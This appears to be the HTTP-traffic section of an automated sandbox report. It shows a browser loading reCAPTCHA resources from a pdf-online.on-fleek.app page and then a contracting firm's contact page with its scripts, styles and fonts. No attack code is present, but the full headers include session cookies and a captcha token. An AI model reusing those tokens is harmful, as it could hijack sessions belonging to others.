Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=d3K15243hDxEmop&MD=Yz1dXwpp HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd&co=aHR0cHM6Ly9wZGYtb25saW5lLm9uLWZsZWVrLmFwcDo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=lw8g0bn9ca2dAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/bg/zEg4NaMiOUeKKZ2pqXY4HMvMf5VCq4avNU_6WgNs2Cw.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd&co=aHR0cHM6Ly9wZGYtb25saW5lLm9uLWZsZWVrLmFwcDo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=lw8g0bn9ca2dAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pdf-online.on-fleek.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pdf-online.on-fleek.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/bg/zEg4NaMiOUeKKZ2pqXY4HMvMf5VCq4avNU_6WgNs2Cw.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://pdf-online.on-fleek.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/reload?k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AGteOyqMV3Be0uZmmDT5kMIC82z5hEj4NJ4LoRFWdAcp7XGN27cw8Qqkir_KSBtQmoc7xmYi1I_AakP1-FtY5aU
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6Tobub5P_1DSWkbyoqwTIdoYcHxHc3hU1RgDt9zmlJhA26OfMLmlBm2Bpo0Z1vb1zRt7gVcjl49Xc_8r1BmnMuhM2CvUmuS9DrPdBSuK5ed67e-F4_taLBnN48LcLXZHIb8mDXDHohSf2jtymIQBdc6XNv0be-uqWei-icZ-GS3nlXuLf5Y12YlYL5bL9j2WKLc2wi&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-NhdAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AGteOyqMV3Be0uZmmDT5kMIC82z5hEj4NJ4LoRFWdAcp7XGN27cw8Qqkir_KSBtQmoc7xmYi1I_AakP1-FtY5aU
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6Tobub5P_1DSWkbyoqwTIdoYcHxHc3hU1RgDt9zmlJhA26OfMLmlBm2Bpo0Z1vb1zRt7gVcjl49Xc_8r1BmnMuhM2CvUmuS9DrPdBSuK5ed67e-F4_taLBnN48LcLXZHIb8mDXDHohSf2jtymIQBdc6XNv0be-uqWei-icZ-GS3nlXuLf5Y12YlYL5bL9j2WKLc2wi&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AGteOyqMV3Be0uZmmDT5kMIC82z5hEj4NJ4LoRFWdAcp7XGN27cw8Qqkir_KSBtQmoc7xmYi1I_AakP1-FtY5aU
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=d3K15243hDxEmop&MD=Yz1dXwpp HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /contact HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /css/reset.css HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /css/plugins.css HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /css/bootstrap.min.css HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /css/style.css HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /css/yourstyle.css HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.2.1/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.citydiamondcontracting.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/logo1.png HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /js/jquery.min.js HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /js/plugins.js HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /js/scripts.js HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /js/bootstrap.bundle.min.js HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /images/rlod.png HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /images/logo1.png HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /js/jquery.min.js HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /js/scripts.js HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /js/plugins.js HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /fonts/sora/Sora-Bold.woff2 HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.citydiamondcontracting.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.citydiamondcontracting.com/css/yourstyle.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.2.1/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.citydiamondcontracting.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.2.1/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.citydiamondcontracting.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fonts/sora/Sora-Medium.woff2 HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.citydiamondcontracting.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.citydiamondcontracting.com/css/yourstyle.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/dynamic/11/a8f19a8ddc204498fd4867850bfee67c.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /images/captcha.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /maps/embed?pb=!1m14!1m8!1m3!1d7220.8946438946405!2d55.258405!3d25.188133!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0x50df22dfd0d09b8f!2sCity%20Diamond%20Contracting%20LLC!5e0!3m2!1sen!2sus!4v1663058383351!5m2!1sen!2sus HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/bootstrap.bundle.min.js HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /images/rlod.png HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
